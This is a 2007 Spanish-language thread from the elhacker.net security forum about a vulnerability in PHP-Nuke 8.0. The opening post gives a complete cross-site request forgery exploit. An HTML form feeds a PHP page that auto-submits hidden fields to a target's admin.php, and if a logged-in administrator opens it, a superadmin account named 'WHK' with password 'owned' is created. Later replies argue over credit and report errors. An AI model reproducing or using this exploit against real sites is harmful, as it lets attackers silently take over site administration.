elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 22:07  


Tema destacado: Sigue las noticias más importantes de elhacker.net en ttwitter!

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Vulnerabilidad en PHP-Nuke permite crear usuarios con derechos de administración
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Vulnerabilidad en PHP-Nuke permite crear usuarios con derechos de administración  (Leído 2,330 veces)
WHK
吴阿卡
Ex-Staff
*
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Vulnerabilidad en PHP-Nuke permite crear usuarios con derechos de administración
« en: 22 Septiembre 2007, 09:47 »

así es, en realidad es una técnica muy facil donde haces que el administrador de un sitio visualize un formulario que se autoenvía de tal forma que crea usuarios con derechos administrativos. Hice un test para que prueven con sus propios host  ;D

http://whk.sitehacking.net/wp-content/themes/PoCs/PHP-Nuke-Admin/

index.html
Código
<style type="text/css">
<!--
body {
background-image: url(fondo.gif);
}
-->
</style><center>
 <h2><u>Prueva del concepto para la creaci&oacute;n de usuarios con derechos administrativos en PHP-Nuke 8.0 o posterior</u></h2>
 <p align="left">&nbsp;</p>
 <p align="left">Recuerda que primeramente Debes iniciar seci&oacute;n en tu cuenta de administraci&oacute;n en PHP-Nuke. </p>
 </center>
<form method="GET" action="index.php">
 <p><b>Host vulnerable:</b>
   <input type="text" name="url">
   <input type="submit" value="Crear Usuario">
 </p>
</form>
 
<p>Una ves enviado este formulario podr&aacute;s ver como se ha creado un nuevo  usuario llamado &quot;WHK&quot; con el password &quot;owned&quot;, el correo enviado es falso por lo cual nadie se apoderar&aacute; de sus pruevas tanto directa como indirectamente. </p>
<p>NOTA: el uso de esta prueva es &uacute;nicamente para crear pruevas en sus propios servidores. </p>
<p>&nbsp;</p>
<p><a href="http://whk.sitehacking.net/">WHK.SiteHacking.Net</a></p>
 

index.php
Código
<?
$URL_SF = $_GET["url"];
$URL = htmlspecialchars("$URL_SF", ENT_QUOTES);
 
 
if($URL == ''){
  echo '<META HTTP-EQUIV="refresh" content="0;URL=http://whk.sitehacking.net/wp-content/themes/PoCs/PHP-Nuke-Admin/">';
}
else {
 
echo '<form method="post" action="' . $URL . '/admin.php">';
echo '<input type=hidden NAME="add_name" value="WHK">';
echo '<input type=hidden NAME="add_aid" value="WHK">';
echo '<input type=hidden NAME="add_email" value="fake@mail.noexiste">';
echo '<input type=hidden NAME="add_url" value="whk.sitehacking.net">';
echo '<input type=hidden NAME="add_admlanguage" value="italian">';
echo '<input type=hidden NAME="add_radminsuper" value="1">';
echo '<input type=hidden NAME="add_pwd" value="owned">';
echo '<input type=hidden NAME="op" value="AddAuthor">';
echo '<input type="image" height="0" width="0">';
echo '<h4>Si no eres redireccionado pulsa el siguiente boton:';
echo '<input name="submit" type="submit" value="Crear usuario">';
echo '</h4>';
echo '</FORM>';
echo '<script>document.getElementsByTagName("form")[0].submit();</script>';
 
}
?>
En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Vulnerabilidad en PHP-Nuke permite crear usuarios con derechos de administra
« Respuesta #1 en: 22 Septiembre 2007, 16:13 »

¿Eres tú h3llcode? Si no lo eres la próxima vez no estaría nada mal que publicases la fuente en vez de atribuirte todos los méritos, en fin...

http://www.securityfocus.com/archive/1/480107/30/30/threaded
En línea
hoax

Desconectado Desconectado

Mensajes: 43


Ver Perfil
Re: Vulnerabilidad en PHP-Nuke permite crear usuarios con derechos de administración
« Respuesta #2 en: 22 Septiembre 2007, 18:33 »

All versions??

Illegal Operation? porque me sale este error? no se crea, no lo permite
En línea
WHK
吴阿卡
Ex-Staff
*
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: Vulnerabilidad en PHP-Nuke permite crear usuarios con derechos de administra
« Respuesta #3 en: 22 Septiembre 2007, 22:55 »

Si había puesto su autor acá http://whk.sitehacking.net/?p=76

http://www.securityfocus.com/archive/1/480107/30/30
http://seguridad-informatica.cl/home/todas-las-versiones-de-php-nuke-vulnerables-a-inyeccion-arbitraria-de-usuario-admin
En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines